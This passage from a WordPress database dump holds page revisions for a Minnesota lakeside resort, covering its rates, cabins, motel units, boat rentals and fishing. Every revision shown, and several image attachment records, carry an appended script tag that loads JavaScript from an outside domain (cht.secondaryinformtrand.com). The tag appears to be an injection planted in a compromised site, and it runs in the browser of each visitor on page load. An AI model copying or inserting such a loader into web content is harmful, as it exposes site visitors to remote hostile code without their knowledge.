our customer\'s return to the resort each year and many have done it for several generations.\r\nThe Resort is nestled on 11 acres of land and has something for everyone. The ultimate location for your family\'s reunion, five Cabins seven Motel rooms both with and without Kitchens a newly remodeled lakeside villa and sixteen lakeside/view campsites for your camper or tent.\r\nGently sloping sandy beach/swim area\r\nFREE WIFI\r\nEnclosed clean fish cleaning facilities.\r\nTHE BEST hand scooped ICECREAM cones ever.\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','About Us','','inherit','closed','closed','','12-revision-v1','','','2017-02-14 09:49:41','2017-02-14 15:49:41','',12,'http://ashbyresort.com/12-revision-v1/',0,'revision','',0),(528,2,'2017-02-14 10:24:59','2017-02-14 16:24:59','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nCamping Electric Sites,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-02-14 10:24:59','2017-02-14 16:24:59','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(529,2,'2017-02-14 10:26:11','2017-02-14 16:26:11','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nCamping Electric Sites,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-02-14 10:26:11','2017-02-14 16:26:11','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(530,2,'2017-02-14 11:02:38','2017-02-14 17:02:38','<img class=\"alignnone  wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3711-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-494\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3841-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-497\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Bandemer-005-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-278\" />\r\nYou can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer.  There is no charge for the use of the kayaks or paddle boat.<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-02-14 11:02:38','2017-02-14 17:02:38','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(531,2,'2017-02-14 11:04:39','2017-02-14 17:04:39','<strong>CATCH SOME MEMORIES</strong>\r\n\r\nPelican Lake is a 4,000 acre lake with miles of interesting bays and coves to fish and explore. Pelican Lake is an excellent fishing lake for Northern, Walleye, Bass, and panfish.\r\n\r\n<strong>JUST TAKE A LOOK</strong>\r\n<img class=\"alignnone size-medium wp-image-371\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/20160522_070826-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" /><img class=\"alignnone size-medium wp-image-368\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/walleyelimit02-016-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-346\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC03568-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-340\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/all-kins-of-pics-009-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-341\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/all-kins-of-pics-012-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-308\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/ResortPics-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-298\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Kussatz-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-204\" src=\"http://ashbyresort.com/wp-content/uploads/2016/06/DSCN2502-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-270\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3572-300x225.jpg\" alt=\"DSCN3572\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-169\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3601-300x225.jpg\" alt=\"DSCN3601\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-170\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611-300x225.jpg\" alt=\"DSCN3611\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-171\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_20160529_165358_102-169x300.jpg\" alt=\"IMG_20160529_165358_102\" width=\"169\" height=\"300\" /> <img class=\"alignnone size-medium wp-image-172\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_4252-300x225.jpg\" alt=\"IMG_4252\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-312\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Fishing09-002-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-176\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2605-300x225.jpg\" alt=\"DSCN2605\" width=\"300\" height=\"225\" /><img class=\"alignnone wp-image-24 size-medium\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/Fishing09-001-300x225.jpg\" alt=\"Fishing09 001\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-105\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/2008-088-300x225.jpg\" alt=\"2008 088\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-355\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3480-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-279\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/boxmeyer-group-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-495\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3810-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-493\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3598-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-490\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3565-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-489\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3540-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-488\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3490-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-452\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/IMAG0458-1-247x300.jpg\" alt=\"\" width=\"247\" height=\"300\" />\r\nPelican lake has wonderful walleye, bass, northern, crappie and sunfish. <script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Fishing','','inherit','closed','closed','','81-revision-v1','','','2017-02-14 11:04:39','2017-02-14 17:04:39','',81,'http://ashbyresort.com/81-revision-v1/',0,'revision','',0),(532,2,'2017-02-15 11:00:58','2017-02-15 17:00:58','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\nKitchenettes #1, 3, 5 &amp; 7\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds\r\n\r\nEach has a stove, microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:00:58','2017-02-15 17:00:58','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(533,2,'2017-02-15 11:19:29','2017-02-15 17:19:29','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\nKitchenettes #1, 3, 5 &amp; 7\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nEach has a stove, microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:19:29','2017-02-15 17:19:29','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(534,2,'2017-02-15 11:27:12','2017-02-15 17:27:12','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\nKitchenettes #1, 3, 5 &amp; 7\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nEach has a stove, microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\nMaximum people is 4 NO PETS NO SMOKING\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:27:12','2017-02-15 17:27:12','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(535,2,'2017-02-15 11:32:40','2017-02-15 17:32:40','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\nKitchenettes #1, 3, 5 &amp; 7\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (an Oven only in unit # 7), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\nMaximum people is 4 NO PETS NO SMOKING\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:32:40','2017-02-15 17:32:40','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(536,2,'2017-02-15 11:34:43','2017-02-15 17:34:43','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n<strong>Kitchenettes #1, 3, 5 &amp; 7</strong>\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (an Oven only in unit # 7), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\nMaximum people is 4 NO PETS NO SMOKING\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:34:43','2017-02-15 17:34:43','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(537,2,'2017-02-15 11:39:09','2017-02-15 17:39:09','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n<strong>Kitchenettes #1, 3, 5 &amp; 7</strong>\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (an Oven only in unit # 7), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\nMaximum people is 4 NO PETS NO SMOKING<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-468\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-467\" />\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:39:09','2017-02-15 17:39:09','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(538,2,'2017-02-15 11:44:06','2017-02-15 17:44:06','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n<strong>Kitchenettes #1, 3, 5 &amp; 7</strong>\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (an Oven only in unit # 7), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-468\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-467\" />\r\nMAXIMUM PEOPLE IS FOUR\r\nNO PETS NO SMOKING\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2017-02-15 11:44:06','2017-02-15 17:44:06','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(539,2,'2017-02-15 11:53:41','2017-02-15 17:53:41','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4197[1]','','inherit','open','closed','','dscn41971','','','2017-02-15 11:53:41','2017-02-15 17:53:41','',46,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971.jpg',0,'attachment','image/jpeg',0),(540,2,'2017-02-15 11:54:40','2017-02-15 17:54:40','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4200[1]','','inherit','open','closed','','dscn42001','','','2017-02-15 11:54:40','2017-02-15 